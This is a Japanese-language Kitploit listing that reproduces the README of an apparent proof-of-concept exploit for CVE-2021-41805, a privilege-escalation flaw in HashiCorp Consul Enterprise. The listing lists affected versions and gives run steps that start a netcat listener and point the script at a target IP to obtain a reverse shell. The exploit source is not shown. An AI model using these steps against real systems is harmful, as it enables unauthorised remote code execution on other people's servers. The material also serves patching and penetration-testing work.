Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41805 — HashiCorp Consul Enterpriseにおいて昇格した特権でリモートコード実行(RCE)を許容する脆弱性CVE-2021-41805の概念実証。 | Kitploit
ツール/GitHubGitHub/acfirthh/cve-2021-41805
特権昇格脆弱性分析エクスプロイトペネトレーションテストクラウドセキュリティ学習と教育リモートアクセスツール
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

HashiCorp Consul Enterpriseにおいて昇格した特権でリモートコード実行(RCE)を許容する脆弱性CVE-2021-41805の概念実証。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] 法的免責事項: このツールは教育目的のみに厳格に使用されるものです! 事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。 このツールを使用する際に適用されるすべての法律を遵守するのはユーザーの責任です。 このツールの開発者は一切の責任を負わず、このプログラムの誤用または損害についても責任を負いません。

CVEについて

ある名前空間のACLトークン(デフォルトのoperator:write権限を持つ)が、別の名前空間で意図しない権限昇格に使用される可能性があります。これを悪用して、昇格した権限で**リモートコード実行(RCE)**を達成できます。

影響を受けるバージョン

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

スクリプトのインストールと実行

  • まず、リポジトリをクローンします:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • クローンしたリポジトリに移動します:
    cd CVE-2021-41805
  • シンプルなリスナーを起動します:
    nc -nvlp <LISTENER_PORT>
  • スクリプトを実行します:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [オプション: -t <ACLトークン> -v (詳細出力) -s (SSL使用)]

リバースシェル

期待される出力

基本引数を使用してエクスプロイトを実行すると: -r [TARGET_IP]、-rp [TARGET_PORT]、-l [LISTENER_IP]、-lp [LISTENER_PORT] (-t [ACL_TOKEN]、-s [SSL使用]) 次のような基本的な出力が得られます:

root@kitploit:~
[*] The PUT request was made successfully. Check your listener...

基本引数に加えて -v [VERBOSE] を指定してエクスプロイトを実行すると、詳細出力が得られます:
詳細出力

エクスプロイトの実行中にエラーが発生し、-v 引数が指定されている場合、出力は次のようになります:
エラーを含む詳細出力

ツールをダウンロード